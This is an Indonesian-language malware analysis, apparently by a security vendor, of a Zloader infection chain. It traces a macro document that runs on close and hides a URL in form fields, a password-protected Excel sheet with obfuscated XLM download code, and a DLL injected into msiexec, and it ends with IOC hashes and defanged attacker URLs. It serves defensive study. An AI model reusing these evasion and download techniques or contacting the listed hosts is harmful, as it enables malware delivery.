Zloader alias Terdot – varian malware perbankan Zeus yang terkenal agresif menggunakan dokumen “.xls” dan “.xlsx” sebagai vektor awal untuk mengirimkan muatannya. Meskipun demikian, baru-baru ini kami menemukan berkas “.docm” yang digunakan oleh keluarga Zloader untuk melakukan aktivitas awalnya. Hal ini menunjukkan bahwa penyerang gemar bereksperimen dengan dokumen perkantoran agar tidak terdeteksi oleh solusi keamanan.

Vektor Awal:
Di sini, rantai infeksi dimulai dengan file “.docm” . Docm adalah singkatan dari “Macro-enabled office word document”. Kita dapat melihat di bawah ini, tampilan dokumen meminta pengguna untuk mengaktifkan konten.

Seperti banyak dokumen lainnya, kami mencoba mengamati aktivitasnya setelah mengaktifkan konten, tetapi tidak ada aktivitas di dalamnya. Dengan melihat kode VBA-nya, kami mendapatkan jawabannya. Mengaktifkan konten tidak akan mengeksekusi makro. Di sini, eksekusi makro dimulai saat "Dokumen ditutup" seperti yang ditunjukkan.

Begitu korban menutup dokumen ini, fungsi “nnn” akan dipanggil, yang merupakan fungsi utama dari makro VBA ini. Di dalamnya, fungsi-fungsi sub dipanggil lagi. Di sini, pihak lawan juga menggunakan “Userform” untuk melakukan aktivitas tahap selanjutnya.

Fungsi UserForm_Initialize() digunakan untuk memanggil "Userform2". Gambar di bawah ini menunjukkan objek userform2. Dalam kotak dialognya, data URL dipotong dan ditumpuk pada ComboBox ke-25 untuk menyembunyikan data sebenarnya seperti yang ditunjukkan di bawah ini.

Setelah memeriksa semua ComboBox userform2, kami dapat menemukan url berbahaya yang digunakan untuk mengunduh muatan tahap ke-2.

Untuk meringkas aktivitas di atas, musuh menggunakan for loop untuk mengakses semua nilai ini dan membuat url akhir seperti yang ditunjukkan di bawah ini,

Situs "hxxps[:]//feelingfit-always[.]com/1[.]php" yang berbahaya dengan skor 11 pada total virus, digunakan untuk mengunduh berkas XLS yang dilindungi kata sandi. Kata sandinya disembunyikan lagi dalam makro VBA di "Userform1". Dengan menjelajahi data userform1, kami dapat mengekstrak kata sandi yang tersembunyi.


Muatan Tahap ke -2 :
Melindungi dokumen dengan kata sandi adalah teknik klasik untuk melindungi diri dari vendor AV. Kata sandi yang benar diperlukan untuk analisis lebih lanjut. Setelah mencocokkan kata sandi di atas, kita akhirnya dapat melihat isi buku kerja Excel. Makro XLM digunakan di "Sheet3" untuk melakukan aktivitas lebih lanjut.

Kode di sini disematkan di berbagai sel dokumen. Gambar di bawah ini menunjukkan kode makro yang diekstrak dari buku kerja di atas:

Di sini, musuh menggunakan fungsi bawaan Excel seperti IIF dan Switch untuk mengaburkan data. Kode akhir yang telah di-de-obfuscating dapat dilihat seperti di bawah ini.
WinHttp.WinHttpRequest.5.1.open DAPATKAN https[:]//santarosafuneralhome[.]com/2.php Salah
WinHttp.WinHttpRequest.5.1.SetRequestHeader
WinHttp.WinHttpRequest.5.1.kirim
Url berbahaya di atas yang memiliki skor total virus 8 digunakan untuk mengunduh muatan tahap ke-3 dari serangan ini.
Analisis Muatan Akhir:
DLL adalah muatan akhir Zloader. Di sini, DLL sangat dikaburkan dan menghindari panggilan langsung ke API Windows. Hashing digunakan untuk menghitung alamat dan membuat panggilan dengan nilai yang telah dihitung, sehingga sulit untuk membalikkan proses.


DLL menciptakan proses 'msiexec.exe', yang merupakan proses Microsoft asli yang termasuk dalam penginstal Komponen Windows, dalam mode ditangguhkan dan menyuntikkan file terenkripsi ke dalamnya.


Ia juga menyuntikkan rutinitas yang akan mendekripsi dan mengeluarkan PE berbahaya untuk dieksekusi.

Dengan pengaturan konteks thread, titik eksekusi awal dilewatkan dan akhirnya kode yang disuntikkan dieksekusi dengan thread resume.
Ketika utas msiexec.exe ini mulai dijalankan, ia mencoba membuat koneksi ke server CnC seperti yang ditunjukkan,

Karena url ini sedang tidak aktif saat analisis dilakukan, kami tidak dapat menyelidikinya lebih dalam.
Kesimpulan:
Jenis serangan ini menunjukkan bagaimana penyerang berinovasi dalam mekanisme mereka untuk memulai rantai infeksi guna membahayakan korban. Pengguna harus selalu berhati-hati saat membuka file Office apa pun. Pemulihan Cepat dan Seqrite solusi keamanan perusahaan Lindungi pelanggan Anda dari file-file tersebut. Jadi, ingatlah untuk selalu memperbarui solusi keamanan titik akhir.
IOC:
DOCM:
117fafb46f27238351f2111e8f01416412044238d2f8378a285063eb9d4eef3d
409ed829f19024045d26cc5d3a06e15a097605e13ba938875eca054a7a4a30b1
91aa050536d834947709776af40c2fde49471d28231de50df0d324cd55101df4
XLS: 52d071922413a3be8815a76118a45bf13d8d323b73ba42377591fd68c59dfc89
URL:
https[://]tiodeitidampheater.tk/post.php
https[://]actes-etatcivil.com/post.php
https[://]ankarakreatif.com/post.php
https[://]www.ramazanyildiz.net/post.php
https[://]hispaniaeng.com/post.php
https[://]www.ifdd.francophonie.org/post.php
Pakar Subjek
Anjali Raut
Priyanka Shinde



